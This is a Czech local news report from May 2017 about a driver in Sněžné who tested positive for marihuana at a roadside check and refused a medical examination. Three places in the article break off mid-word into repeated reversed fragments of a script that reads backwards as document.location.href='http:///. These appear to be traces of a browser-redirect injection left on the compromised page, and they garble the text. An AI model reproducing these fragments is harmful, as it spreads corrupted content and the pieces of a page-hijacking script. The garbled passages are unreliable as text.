Rainbow page separator

Šofér řídil pod vlivem marihuany, lékařské vyšetření odmítl

Neděle, 21. května 2017

Policejní auto, policie, měření rychlosti

Sněžné / Osobní au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil značky Peugeot zastavili novoměstští policisté v pondělí 15. května kolem půl čtvrté odpoledne ve Sněžném.
„V rámci běžné silniční kontroly u řidiče vozidla, kterým byl sedmadvacetiletý muž ze Žďárska, policisté provedli dechovou zkoušku a test na zjištění ovlivnění omamnými a psychotropními látkami. Dechová zkouška byla negativní, test na drogy však vykázal pozitivní výsledek, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na marihuanu,“ informovala policejní mluvčí Stanislava Miláčková.
S podrobením se lékařskému vyšetření, které je spojeno s odběrem biologického materiálu, mladý muž za volantem nesouhlasil. Policisté mu zakázali další jízdu a zadrželi jeho řidičský průkaz. „Případ zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali jako přestupek na úseku dopravy, kterým se dále bude zabývat příslušný správní orgán,“ doplnila mluvčí.